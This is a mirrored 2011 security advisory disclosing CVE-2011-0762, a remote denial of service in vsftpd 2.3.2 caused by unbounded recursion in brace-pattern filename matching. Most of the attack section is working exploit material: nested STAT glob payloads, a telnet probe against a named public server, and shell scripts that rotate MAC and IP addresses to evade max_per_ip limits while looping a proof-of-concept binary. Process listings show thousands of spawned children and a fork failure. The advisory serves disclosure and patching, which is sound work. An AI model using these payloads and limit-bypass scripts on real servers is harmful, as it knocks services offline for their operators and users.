Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25863
HistoryMar 03, 2011 - 12:00 a.m.

vsftpd 2.3.2 remote denial-of-service

2011-03-0300:00:00
vulners.com
89

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ vsftpd 2.3.2 remote denial-of-service ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:

    • Dis.: 23.12.2010
    • Pub.: 01.03.2011

CVE: CVE-2011-0762
CERT: VU#590604

Fix: vsftpd 2.3.4 (15.02.2011)

Affected Software (verified):

    • vsftpd 2.3.2 (NetBSD 5.1)
    • vsftpd 2.3.0 (Ubuntu 10.10)

Affected Servers (19.02.2011):

Original URL:
http://securityreason.com/achievement_securityalert/95

  • β€” 0.Description β€”
    vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is
    secure and extremely fast. It is stable. Don't take my word for it, though. Below,
    we will see evidence supporting all three assertions. We will also see a list of a
    few important sites which are happily using vsftpd. This demonstrates vsftpd is a
    mature and trusted solution.

  • β€” 1. vsftpd 2.3.2 remote denial-of-service β€”
    As we can read in "ls.c" vsftpd file…


…

  • parsing and handling. There is broad potential for any given fnmatch(3)
  • implementation to be buggy.
  • Currently supported pattern(s):
    • any number of wildcards, "*" or "?"
    • {,} syntax (not nested)
      …

That true but anyone who has changed ftpd bsd daemon to vsftpd to protect before
CVE-2010-2632 (glob(3) resource exhaustion) are in danger. Any code with huge
complexity, could allow of denial of service if an affected system received
vulnerable pattern. This bug allow to disable wide range of servers. To designate
vulnerable servers, we have to used pattern with medium complexity.

  • -Example affected serverβ€”
    cx@cx64:~$ telnet ftp.gnu.org 21
    Trying 140.186.70.20…
    Connected to ftp.gnu.org.
    Escape character is '^]'.
    220 GNU FTP server ready.
    USER anonymous
    PASS [email protected]
    STAT {{*},…}
    …
    230 Login successful.
    230 Already logged in.
    213-Status follows:

  • -Example affected serverβ€”

Execution time may have wide range depending on the length of pattern:
empty 2388 97.3 0.0 37980 1352 ? R Dec23 222:42 /usr/sbin/vsftpd

222m and counting…

so any next {{*},Recursion} will increment the complexity. Let's see what is
wrong and where. In vsftpd the main problem exists in ls.c.

  • -ls.c–
    int
    vsf_filename_passes_filter(const struct mystr* p_filename_str,
    const struct mystr* p_filter_str)
    {
    …
    else if (last_token == '{')
    {
    struct str_locate_result end_brace =
    str_locate_char(&filter_remain_str, '}');
    must_match_at_current_pos = 1;
    if (end_brace.found)
    {
    str_split_char(&filter_remain_str, &temp_str, '}');
    str_copy(&brace_list_str, &filter_remain_str);
    str_copy(&filter_remain_str, &temp_str);
    str_split_char(&brace_list_str, &temp_str, ',');
    while (!str_isempty(&brace_list_str))
    {
    str_copy(&new_filter_str, &brace_list_str);
    str_append_str(&new_filter_str, &filter_remain_str);
    if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))
    <===== LIMIT THIS CALL
    {
    ret = 1;
    …
  • -ls.c–

Code:
if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str)) <===== LIMIT
THIS CALL

this call should be limited, and in version 2.3.4 has been fixed.

A simple way to show growth in computing power …
(1234…*count(vsf_filename_passes_filter complexity)) ==
count(vsf_filename_passes_filter complexity)!

Compare two patterns and see different between

STAT
{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}

and add next {*,…}

STAT
{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}

and in the end, compare:
STAT
{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

hovever in vsftpd, command lenght is allowed to 4096 bytes. So it's no problem to
create request with a huge complexity

To bypass max_per_ip, use ISP with dynamic ip. Disconnect and connect (example
for bt mobile phone):

cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up

and connect again.

  • β€”PoCβ€”
    Download vspoc232.c and compile, then create some script to changing your ip
    (netbsd51: pcn0)

  • -change.sh; change ip by mac(local dos)β€”
    #!/bin/sh

example change ip script

ifconfig pcn0 down
/etc/rc.d/dhclient stop
ifconfig pcn0 link 00:0c:0c:0c:$1:$2 active
dhclient pcn0
/etc/rc.d/dhclient start
ifconfig pcn0 up

  • -change.sh; change ip by mac(local dos)β€”

or use mobile phone via bluetooth.

  • -change.sh; conn-diss btβ€”
    #!/bin/sh

example change ip script

hciconfig hci0 down
hciconfig hci0 up

  • -change.sh; conn-diss btβ€”

then run.sh

  • -run.shβ€”
    #!/bin/sh

vsftpd exploit with change ip option

sh run.sh [ip] [port] [user] [password]

mac=0;
echo "vsftpd exploit";
while [ $mac != 0xff ]; do {
mac=`expr $mac + 1`;
./vspoc232 $1 $2 $3 $4
sh ./change.sh 66 $mac
} done

  • -run.shβ€”

then run and see result

sh ./run.sh 172.5.0.129 21 cx pass

on my local netbsd5.1 (default instalation), we reach to limit and no more new
processes (DoS).

Result (forked dos):
cx@cx64:~$

USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
…
root 149 0.0 0.1 2932 1152 ? Is 2:31AM 0:00.01 vsftpd /usr/pkg/e
cx 150 0.0 0.2 2956 1592 ? R 2:32AM 0:01.22 vsftpd /usr/pkg/e
cx 160 0.3 0.2 2956 1592 ? R 2:31AM 0:01.48 vsftpd /usr/pkg/e
cx 161 0.2 0.2 2956 1592 ? R 2:32AM 0:01.03 vsftpd /usr/pkg/e
root 258 0.0 0.1 2932 1152 ? Is 2:32AM 0:00.01 vsftpd /usr/pkg/e
root 278 0.0 0.1 2932 1152 ? Is 2:32AM 0:00.02 vsftpd /usr/pkg/e
cx 289 0.0 0.2 2956 1592 ? R 2:32AM 0:00.97 vsftpd /usr/pkg/e
cx 321 0.0 0.2 2956 1592 ? R 2:32AM 0:00.85 vsftpd /usr/pkg/e
…
root 5139 0.0 0.1 2932 1164 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
root 5145 0.0 0.1 2932 1164 ? Is 2:35AM 0:00.02 vsftpd /usr/pkg/e
root 5156 0.0 0.1 2932 1164 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
root 5159 0.0 0.1 2932 1164 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
cx 5170 0.0 0.2 2956 1608 ? R 2:35AM 0:00.44 vsftpd /usr/pkg/e
root 5190 0.0 0.1 2932 1168 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
cx 5192 0.0 0.2 2956 1612 ? R 2:35AM 0:00.39 vsftpd /usr/pkg/e
cx 5242 0.0 0.2 2956 1612 ? R 2:35AM 0:00.39 vsftpd /usr/pkg/e
cx 5250 0.0 0.2 2956 1612 ? R 2:35AM 0:00.49 vsftpd /usr/pkg/e
root 7199 0.0 0.1 2932 1164 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
cx 7248 0.0 0.2 2956 1612 ? R 2:35AM 0:00.63 vsftpd /usr/pkg/e
root 7256 0.0 0.1 2932 1168 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e
root 7276 0.0 0.1 2932 1168 ? Is 2:35AM 0:00.01 vsftpd /usr/pkg/e

bypassing max_per_ip we have created more than 5000 vsftdp children processes.

cx@cx64:~$ telnet 172.5.0.129 21
Trying 172.5.0.129…
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.

Email:

    • cxib {a\./t] securityreason [d=t} com

GPG:

http://securityreason.com/
http://cxib.net/
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJNbOqVAAoJEIO8+dzW5bUwzAIP/0JQa6sG5brCN2DyMJ+1ckEE
EBXTTPlNjZ6UEKw2siJIqEkIeRXKx0878CNzKAX7vIzWLaTt0LqGUJ9S+MBu+E0x
m0ZmnPZ6FzWTQ5mIXEF4PvMsArHB72gpeqUxxtPSffl8joOXI8L4ARuMOKMb7iCj
/e0FjD2RQTDhABjpJ6PuXlW/OSrn3k5BGavi7/DEmZzon0eJckTJCYnnipAl33nC
tq/Ll10pqacEZir4ph5d6Ky/Seo5b8E6biESud7rcUor+4KX2Kt3UsJ+4N6J2U/F
7H//5Hx6EB12EMdcvx3AVntcAS1M0dXhKJKvwWhon8R+w6P4cY74ntR3n1oM37JD
7dMSro+PPlmEBZCd6OfRI4liuzmHFe5IzBJD+CHMaED+q3SlgGPfJ02CbxPUjJZD
8DsfLDYZihFu/4mDY4tG7eg+4idwJhrWGq0BxJG6Uw/YSQq9xD+qlKBQ3iRXIgCG
BCaC1N/z127aohIYaN//E9RTw8oySmhbkqPLtVXd14hQJHux38Cfpgh5f+UD0e50
8JVQtB99K4eLH1ZfEUn8DUxDszZB+2zZJJXGXd9FrgM7gc6mPIErKlaDdzPES5YW
iYkQ4YpSGQ4Q+EXQ6NL4OcRtwBL02NWoycq1PrB76VfD8Jaqizoi0kbFMwVW8Ln4
KJG2xhu2XzsdwI2DqGMq
=OKvL
-----END PGP SIGNATURE-----